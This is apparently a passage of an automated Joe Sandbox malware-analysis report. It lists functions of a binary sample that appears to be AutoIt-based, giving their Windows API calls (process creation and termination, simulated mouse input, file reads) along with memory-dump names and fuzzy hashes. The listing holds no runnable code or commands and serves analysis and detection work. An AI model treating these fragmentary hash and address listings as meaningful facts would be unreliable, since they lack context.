                                      • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                      • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009C9908
                                    • RtlEnterCriticalSection.KERNEL32(?), ref: 009C9924
                                    • RtlLeaveCriticalSection.KERNEL32(?), ref: 009C999E
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009C99B3
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 009C99D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 2537439066-0
                                    • Opcode ID: 311eaf997a1ccda41cf67f6f2d7dcff3ff29a018d113bbad3e60a3293bd22a6c
                                    • Instruction ID: be623eac38007b64a66ecca8166888bc8fae424c3785fb8de3b1484160dd1f93
                                    • Opcode Fuzzy Hash: 311eaf997a1ccda41cf67f6f2d7dcff3ff29a018d113bbad3e60a3293bd22a6c
                                    • Instruction Fuzzy Hash: C4315232A00105EBDF10DF99DC89EAAB778FF84310B148069F905EB256D770DE11DBA1
                                    Function 009D9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,009D77F4,?,?,00000000,00000001), ref: 009D9B53
                                      • Part of subcall function 009D6544: GetWindowRect.USER32(?,?), ref: 009D6557
                                    • GetDesktopWindow.USER32 ref: 009D9B7D
                                    • GetWindowRect.USER32(00000000), ref: 009D9B84
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009D9BB6
                                      • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                    • GetCursorPos.USER32(?), ref: 009D9BE2
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009D9C44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: 5e10e339937f35bc9a366f441c6ce39a127b3a2614fc8e120a7b6cde4f8f0155
                                    • Instruction ID: 159e8e4f0c521be7221f9a4fe51d806e738fb9e800fd7044d20199d124268ded
                                    • Opcode Fuzzy Hash: 5e10e339937f35bc9a366f441c6ce39a127b3a2614fc8e120a7b6cde4f8f0155
                                    • Instruction Fuzzy Hash: 2231BE72544309ABD710DFA89C49F9AB7EDFF88314F00091AF585A7281D671E909CB92
                                    Function 009BAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009BAFAE
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 009BAFB5
                                    • 74747ED0.USERENV(?,00000004,00000001), ref: 009BAFC4
                                    • CloseHandle.KERNEL32(00000004), ref: 009BAFCF
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009BAFFE
                                    • 74747F30.USERENV(00000000), ref: 009BB012
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$74747$CloseCreateCurrentHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1083966619-0
                                    • Opcode ID: 9c2adadf36fff9b525ec85eaac640d710fbe47d08e26bf7032ca87ac64ac1f9b
                                    • Instruction ID: 4666ea247d000c790ea7a911ab5e13c9047b7df0867277ec70b734c502bf71bf
                                    • Opcode Fuzzy Hash: 9c2adadf36fff9b525ec85eaac640d710fbe47d08e26bf7032ca87ac64ac1f9b
                                    • Instruction Fuzzy Hash: 9E2149B210420DABDB02DFE4DE09BEE7BA9AB44324F044015FA01A6161C376DD22EB61
                                    Function 009EEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                      • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                      • Part of subcall function 0099AF83: BeginPath.GDI32(?), ref: 0099B009
                                      • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099B033
                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 009EEC20
                                    • LineTo.GDI32(00000000,00000003,?), ref: 009EEC34
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EEC42
                                    • LineTo.GDI32(00000000,00000000,?), ref: 009EEC52
                                    • EndPath.GDI32(00000000), ref: 009EEC62
                                    • StrokePath.GDI32(00000000), ref: 009EEC72
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 023de4020d2552c22181356a16e9cfb5840b33f31c7feaad1a6eace75858176f
                                    • Instruction ID: 767d1ff1c6a222d5558e330057733e9547b96f15b0bddb0e3ab84dbd02fb30d2
                                    • Opcode Fuzzy Hash: 023de4020d2552c22181356a16e9cfb5840b33f31c7feaad1a6eace75858176f
                                    • Instruction Fuzzy Hash: 0011F77600014DBFEB02DFD4DD88EEA7F6DEB08354F048112BE0989160D7719D569BA0
                                    Function 009BE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 009BE1C0
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 009BE1D1
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009BE1D8
                                    • ReleaseDC.USER32(00000000,00000000), ref: 009BE1E0
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009BE1F7
                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 009BE209
                                      • Part of subcall function 009B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,009B9A05,00000000,00000000,?,009B9DDB), ref: 009BA53A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                    • String ID:
                                    • API String ID: 603618608-0
                                    • Opcode ID: acefa3d6fda0d003cd312fdad50e666cb1e1b0ecffcb8ec63057fe838a3e9d4b
                                    • Instruction ID: 3e70b19ad5083e6d0b8effd63eea69c7f6348c3dd7838c722914d00f980c4a07
                                    • Opcode Fuzzy Hash: acefa3d6fda0d003cd312fdad50e666cb1e1b0ecffcb8ec63057fe838a3e9d4b
                                    • Instruction Fuzzy Hash: 410184B5A00218BFEB109FE58C45B9EBFB8EB48351F004066EA04A7290D6719C02CBA0
                                    Function 009A7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __init_pointers.LIBCMT ref: 009A7B47
                                      • Part of subcall function 009A123A: __initp_misc_winsig.LIBCMT ref: 009A125E
                                      • Part of subcall function 009A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009A7F51
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A7F65
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A7F78
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A7F8B
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A7F9E
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A7FB1
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A7FC4
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A7FD7
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A7FEA
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A7FFD
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A8010
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A8023
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A8036
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A8049
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A805C
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 009A806F
                                    • __mtinitlocks.LIBCMT ref: 009A7B4C
                                      • Part of subcall function 009A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00A3AC68,00000FA0,?,?,009A7B51,009A5E77,00A36C70,00000014), ref: 009A7E41
                                    • __mtterm.LIBCMT ref: 009A7B55
                                      • Part of subcall function 009A7BBD: RtlDeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009A7B5A,009A5E77,00A36C70,00000014), ref: 009A7D3F
                                      • Part of subcall function 009A7BBD: _free.LIBCMT ref: 009A7D46
                                      • Part of subcall function 009A7BBD: RtlDeleteCriticalSection.KERNEL32(00A3AC68,?,?,009A7B5A,009A5E77,00A36C70,00000014), ref: 009A7D68
                                    • __calloc_crt.LIBCMT ref: 009A7B7A
                                    • GetCurrentThreadId.KERNEL32 ref: 009A7BA3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                    • String ID:
                                    • API String ID: 2942034483-0
                                    • Opcode ID: 052334b5687690b0acefb3f91b47649f9d1df8ee8890fc1a9409167f6f775c87
                                    • Instruction ID: 3a82c66229465dac0df031e3688129864ddead28aa6373a7eb7f6ccd6e48b50d
                                    • Opcode Fuzzy Hash: 052334b5687690b0acefb3f91b47649f9d1df8ee8890fc1a9409167f6f775c87
                                    • Instruction Fuzzy Hash: A4F0907210D3121AEA24B7F47C0BB4BA6989F83734F2406A9F8A0C90E2FF21884241F0
                                    Function 009827EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0098281D
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00982825
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00982830
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0098283B
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00982843
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0098284B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: 0b4ed021063d0fb12ec438d03bb83eb09cf1510823c3f0f9c4401ec8e3ec074e
                                    • Instruction ID: 59504fd36e985c3d85a635ae475179588be1aeac95e671a0f049c2a122b4931f
                                    • Opcode Fuzzy Hash: 0b4ed021063d0fb12ec438d03bb83eb09cf1510823c3f0f9c4401ec8e3ec074e
                                    • Instruction Fuzzy Hash: 530167B1902B5EBDE3008FAA8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                    Function 009C9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 1423608774-0
                                    • Opcode ID: bf2d27622c3f15a3478989ee61da448201170e45f9f55a46e735d3e0a6d65af7
                                    • Instruction ID: 89d8be5fa050388d401fe3f061f7ef9e8866237c3fe77547526d923f558c2dc1
                                    • Opcode Fuzzy Hash: bf2d27622c3f15a3478989ee61da448201170e45f9f55a46e735d3e0a6d65af7
                                    • Instruction Fuzzy Hash: 28018133902611ABD715ABD4ED4CFEB7769FF8C701B04042DF503920A4DB74A802DB51
                                    Function 009C7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009C7C07
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009C7C1D
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 009C7C2C
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C3B
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C45
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C4C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 4cfa739cc5340220d447cc22334c52dc428bd90c83c525cf8c127bdb3b816cd6
                                    • Instruction ID: abaadf61be885949afd177d14e128f448fe7c899381ff99c00d21bd0f915057d
                                    • Opcode Fuzzy Hash: 4cfa739cc5340220d447cc22334c52dc428bd90c83c525cf8c127bdb3b816cd6
                                    • Instruction Fuzzy Hash: A4F01772641158BBE6219BD29C0EEEF7F7CEBC6B15F000118FA0192051EBA15A43D6B5
                                    Function 009C9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 009C9A33
                                    • RtlEnterCriticalSection.KERNEL32(?,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A44
                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A51
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A5E
                                      • Part of subcall function 009C93D1: CloseHandle.KERNEL32(?,?,009C9A6B,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C93DB
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 009C9A71
                                    • RtlLeaveCriticalSection.KERNEL32(?,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: 2c34221f7f8cb96a86f67e6da3bce39b7d22e8772721ccc6dea8f0df364c9a70
                                    • Instruction ID: a74371c70ed6c94812ba7775ba051aae6d25ba4691ca28aae19d631dd3cfba3b
                                    • Opcode Fuzzy Hash: 2c34221f7f8cb96a86f67e6da3bce39b7d22e8772721ccc6dea8f0df364c9a70
                                    • Instruction Fuzzy Hash: 58F08233941215ABD7116BE4EC8DEEB7B39FF8C301B140425F603950A4DB759913DB51
                                    Function 00981CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                      • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                    • __swprintf.LIBCMT ref: 00981EA6
                                    Strings
                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00981D49
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                    • API String ID: 2125237772-557222456
                                    • Opcode ID: 5b70aef8c973ac0ba110d3baa90d65112fc60d92937b2fadc295701a6d94ce66
                                    • Instruction ID: 91b0a829080307cdf73867a625ebe56616cc4ba9e06b4444b95f351360c1af4b
                                    • Opcode Fuzzy Hash: 5b70aef8c973ac0ba110d3baa90d65112fc60d92937b2fadc295701a6d94ce66
                                    • Instruction Fuzzy Hash: DD914AB1508205AFC724FF24C995E6AB7A8AFD5700F04492DF996972A2DB30ED05CB92
                                    Function 009DAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 009DB006
                                    • CharUpperBuffW.USER32(?,?), ref: 009DB115
                                    • VariantClear.OLEAUT32(?), ref: 009DB298
                                      • Part of subcall function 009C9DC5: VariantInit.OLEAUT32(00000000), ref: 009C9E05
                                      • Part of subcall function 009C9DC5: VariantCopy.OLEAUT32(?,?), ref: 009C9E0E
                                      • Part of subcall function 009C9DC5: VariantClear.OLEAUT32(?), ref: 009C9E1A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    • Opcode ID: 2eea9c71765b6e70b7ba9b39c862e9018de76190680fb808f6e429204626a34e
                                    • Instruction ID: 4fcf2de2620dcc0465a852ffe84b569a4d27e10e09fd1da072f8e07db17c074f
                                    • Opcode Fuzzy Hash: 2eea9c71765b6e70b7ba9b39c862e9018de76190680fb808f6e429204626a34e
                                    • Instruction Fuzzy Hash: 05917C75648301DFCB10EF24C495A5AB7E8EFC8704F04886EF99A9B3A1DB31E945CB52
                                    Function 009C5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                    • _memset.LIBCMT ref: 009C5438
                                    • GetMenuItemInfoW.USER32(?), ref: 009C5467
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009C5513
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009C553D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: f01997063cd16e7a1bc9a825b1ddb2f437042f90fdc9ffe2820fa99c70989ab3
                                    • Instruction ID: 74eb3905ce055e16c37f555f9a70d2c41678ca2985afdb2e18c37eaac782f8a7
                                    • Opcode Fuzzy Hash: f01997063cd16e7a1bc9a825b1ddb2f437042f90fdc9ffe2820fa99c70989ab3
                                    • Instruction Fuzzy Hash: 36510072A087419BD7149B28C840F6BB7E8AF95360F050A2DF895D31A0DBA4EDC08B53
                                    Function 009C0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                    Download Yara Rule
